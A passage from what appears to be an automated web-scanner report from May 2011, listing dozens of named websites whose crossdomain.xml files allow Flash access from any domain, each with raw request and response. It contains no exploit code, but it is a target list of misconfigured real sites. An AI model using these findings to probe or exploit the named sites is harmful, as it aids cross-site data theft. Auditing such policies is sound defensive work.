Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.openfilm.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 03:30:17 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 228
Last-Modified: Wed, 09 Feb 2011 12:46:55 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-access-from domain="*.openfilm.com"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false
...[SNIP]...

6.93. http://www.ovm.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovm.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ovm.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:01:10 GMT
Server: Apache
Last-Modified: Tue, 04 Aug 2009 17:21:26 GMT
ETag: "31a8019-d6-1dc73180"
Accept-Ranges: bytes
Content-Length: 214
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-
...[SNIP]...

6.94. http://www.percyjacksonbooks.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.percyjacksonbooks.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.percyjacksonbooks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:00:26 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.14 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 05 May 2009 16:39:30 GMT
ETag: "70788-d7-4692cec40f480"
Accept-Ranges: bytes
Content-Length: 215
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross
...[SNIP]...

6.95. http://www.performgroup.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.performgroup.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.performgroup.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 04 May 2011 04:15:03 GMT
Last-modified: Wed, 04 May 2011 04:10:58 GMT
Cache-control: max-age=600
Content-length: 322
Content-type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.96. http://www.phoneofvoip.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.phoneofvoip.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.phoneofvoip.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:50:55 GMT
Server: Apache
Last-Modified: Thu, 17 Jun 2010 15:03:44 GMT
ETag: "130094-68-4893b2504f400"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.97. http://www.photofunia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.photofunia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.photofunia.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Wed, 04 May 2011 02:33:19 GMT
Content-Type: text/xml
Content-Length: 192
Last-Modified: Fri, 09 Apr 2010 07:27:42 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

6.98. http://www.pirelli.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pirelli.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pirelli.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:02:49 GMT
Server: Apache/1.3.34 (Debian)
Last-Modified: Thu, 14 Feb 2008 17:17:08 GMT
Accept-Ranges: bytes
Content-Length: 203
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.99. http://www.pratttribune.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pratttribune.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pratttribune.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:55:34 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.ghm.zope.net
X-Cache: MISS from cache6.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache6.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.100. http://www.primusville.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.primusville.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.primusville.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:03:17 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Tue, 03 Aug 2010 20:46:36 GMT
ETag: "230050-13e-69bf6300"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-access-from to-ports="443" secure="false" domain="app.topspin.net"/>
<allow-access-from secure="false" domain="*.macromedia.com"/>
<allow-access-from secure="false" domain="*.adobe.com"/>
...[SNIP]...

6.101. http://www.puuko.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.puuko.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.puuko.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:21:33 GMT
Server: Apache
Last-Modified: Thu, 19 Mar 2009 13:52:34 GMT
ETag: "350d8c8-8d-49c24e22"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

6.102. http://www.quakersteakandlube.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.quakersteakandlube.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.quakersteakandlube.com

Response

HTTP/1.1 200 OK
Content-Length: 202
Content-Type: text/xml
Content-Location: http://www.quakersteakandlube.com/crossdomain.xml
Last-Modified: Tue, 08 Mar 2011 22:30:14 GMT
Accept-Ranges: bytes
ETag: "e7419d64e0ddcb1:1a6749"
Server: Microsoft-IIS/6.0
Hosted-With: GearHost Inc. (www.gearhost.com)
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:02:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.103. http://www.radiofarda.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.radiofarda.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.radiofarda.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 04 Jun 2008 14:47:18 GMT
Accept-Ranges: bytes
ETag: "1C8C651E2D01F00"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-UA-Compatible: IE=edge
Content-Length: 310
Cache-Control: public, max-age=0
Expires: Wed, 04 May 2011 03:47:02 GMT
Date: Wed, 04 May 2011 03:47:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitte
...[SNIP]...

6.104. http://www.realore.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realore.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realore.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 04 May 2011 01:13:27 GMT
Content-Type: text/xml
Content-Length: 231
Last-Modified: Tue, 31 Aug 2010 13:36:25 GMT
Connection: close
Expires: Wed, 18 May 2011 01:13:27 GMT
Cache-Control: max-age=1209600
Accept-Ranges: bytes

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" heade
...[SNIP]...

6.105. http://www.ringtonekey.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ringtonekey.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ringtonekey.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:59 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 05 Mar 2010 07:15:00 GMT
ETag: "6fc96a1-68-481087933c500"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.106. http://www.sanmanuel.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sanmanuel.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sanmanuel.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:03 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.3
Last-Modified: Mon, 10 Jan 2011 23:43:31 GMT
ETag: "200000000676f-101-4998689123ab7"
Accept-Ranges: bytes
Content-Length: 257
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*.sanmanuel.com" />
<allow-access-from domain="sanmanuel.com" />
<allow-access-from domain="www.sanmanuel.com" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.107. http://www.semilo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.semilo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.semilo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:55:36 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 17:41:25 GMT
ETag: "24b0002-69-48394f45d5b40"
Accept-Ranges: bytes
Content-Length: 105
X-Server: wsl03
X-Site: www.semilo.info
X-Aliases: semilo.info *.semilo.info *.semilo.nl semilo.nl *.semilo.com semilo.com *.semilo.net semilo.net *.semilo.be semilo.be *.semilo.de semilo.de *.semilo.co.uk semilo.co.uk *.semilo.org semilo.org *.semilo.biz semilo.biz *.semilo.tv semilo.tv *.semilo.nu semilo.nu *.semilo.eu semilo.eu *.semilog.nl semilog.nl *.semmilo.nl semmilo.nl *.semilo.mobi semilo.mobi *.pre-game-commercials.nl pre-game-commercials.nl *.akjz.nl akjz.nl *.semilo.it semilo.it *.click-box.nl click-box.nl *.liveactionads.nl liveactionads.nl *.a-platform.nl a-platform.nl *.aplatform.nl aplatform.nl *.semilo.es semilo.es *.engagementtargeting.nl engagementtargeting.nl
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.108. http://www.silkpurealmond.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.silkpurealmond.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.silkpurealmond.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:28:33 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 12:19:32 GMT
ETag: "278042-d7-49a969cb93d00"
Accept-Ranges: bytes
Content-Length: 215
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.109. http://www.skittles.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.skittles.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.skittles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Feb 2011 18:03:20 GMT
ETag: "1c385-63-658cea00"
Accept-Ranges: bytes
Content-Length: 99
Content-Type: text/xml
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.110. http://www.slizone.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.slizone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slizone.com

Response

HTTP/1.0 200 OK
Content-Length: 211
Content-Type: text/xml
Last-Modified: Wed, 19 Mar 2008 19:52:29 GMT
Accept-Ranges: bytes
ETag: "7ef6bec3fa89c81:241"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Wed, 04 May 2011 01:16:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-dom
...[SNIP]...

6.111. http://www.smalldressup.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.smalldressup.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smalldressup.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 02 May 2010 13:14:05 GMT
Accept-Ranges: bytes
Content-Length: 264
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.112. http://www.smucker.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.smucker.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smucker.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 209
Content-Type: text/xml
Last-Modified: Wed, 13 May 2009 18:45:25 GMT
Accept-Ranges: bytes
ETag: "c0db83fafad3c91:3d4f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:46:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domai
...[SNIP]...

6.113. http://www.sooeveningnews.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.sooeveningnews.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sooeveningnews.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:12:04 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
Age: 484
X-Cache: HIT from parent1.ghm.zope.net
X-Cache: MISS from cache5.ghm.zope.net
Via: 1.0 parent1.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache5.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.114. http://www.startlap.hu/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.startlap.hu
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.startlap.hu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:46:57 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 140
Vary: Accept-Encoding
W: w34
Connection: close
Content-Type: text/xml

<cross-domain-policy>

<allow-access-from domain="*" />
</cross-domain-policy>

6.115. http://www.stream.cz/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.stream.cz
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stream.cz

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:18:17 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 07:56:03 GMT
ETag: "10108a9-cd-4a20a015baac0"
Accept-Ranges: bytes
Content-Length: 205
Cache-Control: max-age=0, no-cache, must-revalidate, no-transform
Pragma: no-cache
X-XRDS-Location: http://id.seznam.cz/yadis
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.116. http://www.terrypaton.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.terrypaton.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.terrypaton.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 11 Aug 2009 01:53:14 GMT
ETag: "12390c-184-f72a5680"
Accept-Ranges: bytes
Content-Length: 388
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

6.117. http://www.thecoastalsource.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thecoastalsource.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thecoastalsource.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:09 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n12 ( iad-agg-n3), ms iad-agg-n3 ( origin)
ETag: "0b66c58755c71:0"
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 01:07:09 GMT
Age: 0
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.118. http://www.trade2finance.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trade2finance.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.trade2finance.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:03 GMT
Server: Apache
Last-Modified: Sun, 04 Apr 2010 16:01:50 GMT
ETag: "d2d748-68-4bb8b7ee"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.119. http://www.tv5.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tv5.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tv5.org

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 05 Jul 2010 09:37:31 GMT
ETag: "117ac3-d6-af856cc0"
Accept-Ranges: bytes
Content-Length: 214
Content-Type: text/xml
Date: Wed, 04 May 2011 00:46:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-
...[SNIP]...

6.120. http://www.ucanbuyme.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ucanbuyme.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ucanbuyme.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:18 GMT
Server: Apache/2.2.4 (Fedora)
Vary: Host
Last-Modified: Tue, 05 Jan 2010 01:09:47 GMT
ETag: "1bb1326-8d-7e72ccc0"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

6.121. http://www.uhc-networkbulletin.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.uhc-networkbulletin.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.uhc-networkbulletin.com

Response

HTTP/1.1 200 OK
Content-Length: 84
Content-Type: text/xml
Last-Modified: Tue, 12 Apr 2011 15:33:28 GMT
Accept-Ranges: bytes
ETag: "a05ecdf826f9cb1:a56c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:01:46 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.122. http://www.ussoccer.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ussoccer.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ussoccer.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Aug 2009 23:52:48 GMT
Accept-Ranges: bytes
ETag: "20b587819514ca1:0"
Server: Microsoft-IIS/7.0
X-Server: PRODWEB02
X-Powered-By: ASP.NET
Content-Length: 243
Date: Wed, 04 May 2011 03:49:46 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain
...[SNIP]...

6.123. http://www.vdopia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vdopia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vdopia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 13 Mar 2008 08:17:51 GMT
ETag: "20691-ca-4484d308be9c0"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.124. http://www.versuscountrybagamonsterbuck.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.versuscountrybagamonsterbuck.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.versuscountrybagamonsterbuck.com

Response

HTTP/1.1 200 OK
Content-Length: 213
Content-Type: text/xml
Last-Modified: Tue, 01 Sep 2009 19:44:05 GMT
Accept-Ranges: bytes
ETag: "44f999903c2bca1:273"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:47:28 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-dom
...[SNIP]...

6.125. http://www.visitpensacola.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.visitpensacola.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.visitpensacola.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 06 May 2010 20:28:00 GMT
ETag: "55299b5-e1-485f2c75a3400"
Accept-Ranges: bytes
Content-Length: 225
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 01:49:18 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.126. http://www.wandtv.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wandtv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wandtv.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS29
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac8"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 02:55:43 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 02:55:43 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

6.127. http://www.washfm.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.washfm.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washfm.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3190353162
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 02:35:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:35:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.128. http://www.watfordoutlet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.watfordoutlet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
